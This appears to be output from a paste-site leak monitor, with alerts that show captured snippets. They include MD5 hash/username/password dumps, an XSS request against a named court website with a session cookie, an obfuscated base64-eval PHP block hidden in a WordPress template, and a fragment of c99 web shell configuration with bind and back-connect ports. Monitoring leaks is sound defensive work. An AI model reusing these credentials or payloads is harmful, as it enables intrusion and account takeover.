Potential leak of data: MD5/SHA1 Hashes


Detected 27 occurrence(s) of ‘[\s\|:;'"]+[0-9a-f]{32}(?:[0-9a-f]{8})?[\s\|:;'"]+’:
D5: petitprince
0713e2e552ee2c8b5faca9382806e4fe MD5: arzelier
076cb18a6adfe65358980ee37d5432cd MD5: somaque
07b351fbc3a7214f7f102974dfbf51c9 MD5: c51da807
07bf356b6359519ad3b688603f92729d MD5: abondance
07bf356b6359519ad3b688603f92729d MD5: abondance
07c53dd9b66d7f2e38559d08142bc704 MD5: manou49

Potential leak of data: MD5/SHA1 HashesMD5/SHA1 Hashes, pastebin.com


Detected 29 occurrence(s) of ‘[\s\|:;'"]+[0-9a-f]{32}(?:[0-9a-f]{8})?[\s\|:;'"]+’:
mack
3d801aa532c1cec3ee82d87a99fdf63f temp kbaughan
cb3e2f73fb19118a5f6c2189d9aa9bfb t0m123123 t0mb.exe
f9567495dd1659503a672acbce3f95e1 jayc jayc
262f010beedf8cd1b83277030c3b3210 imhatimi baDsectQr
90d5b13f5ed228101aefbada75460c88 clienthax clienthax
4a1a27296188c273f6733ead4fe4eff6 got You

Potential leak of data: Targeted Website


Detected 1 occurrence(s) of ‘^target: (http|www)’:
     @TheWikiBoatBR

Target: www.jfsp.jus.br

GET /2001/themes/jfsp/templates/1</title>1<ScRiPt>alert('XSS');</ScRiPt> HTTP/1.1
Cookie: PHPSESSID=maqvblm2s6hna97qsoliq0nk21kkvg4v
Host: www.jfsp.jus.br
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (co

Potential leak of data: Obfuscated PHP Code


Detected 1 occurrence(s) of ‘\?php.*(eval|urldecode)\(.*\>’:
l_block"><img class="ie6fix noborder alignleft" src="<?php echo bloginfo('template_url'); ?>/images/skin1/rss_32.png" alt="" />If you like what we do, please don't hestitate and subscribe to our <a href="<?php bloginfo('rss2_url'); ?>">RSS Feed.</a></p>
<?php $_F=__FILE__;$_X='Pz4JCQk8cCBjbDFzcz0ic20xbGxfYmwyY2siPjw0bWcgY2wxc3M9IjQ1ZWY0eCBuMmIycmQ1ciAxbDRnbmw1ZnQiIHNyYz0iPD9waHAgNWNoMiBibDJnNG5mMigndDVtcGwxdDVfM3JsJyk7ID8+LzRtMWc1cy9zazRuNi80bmYyX2IzdHQybl9vYS5wbmciIDFsdD0iIiAvPiZjMnB5OyBhMDYwLiBUaDVtNSBCeTogPDEgaHI1Zj0iaHR0cDovL3d3dy5pdGg1bTVzLmMybS8iPlcycmRQcjVzcyBUaDVtNXM8LzE+IFNwMm5zMnI1ZCBCeTogIDwxIGhyNWY9Imh0dHA6Ly93d3cuaDJzdHN0MnI1LmMybSI+RDVkNGMxdDVkIFM1cnY1cnM8LzE+LjwvcD4NCgkJPC9kNHY+DQoJPD9waHANCgl9DQp9DQoNCg0KPz4=';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

Potential leak of data: Test


Detected 1 occurrence(s) of ‘default (pass|passwd|password|secret)’:
femode_diskettes = range("a","z");
$hexdump_lines = 8;        // lines in hex preview file
$hexdump_rows = 24;        // 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = "c99";          // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe

// Command-aliases
if (!$win)
{
 $cmdaliases = array(
  array("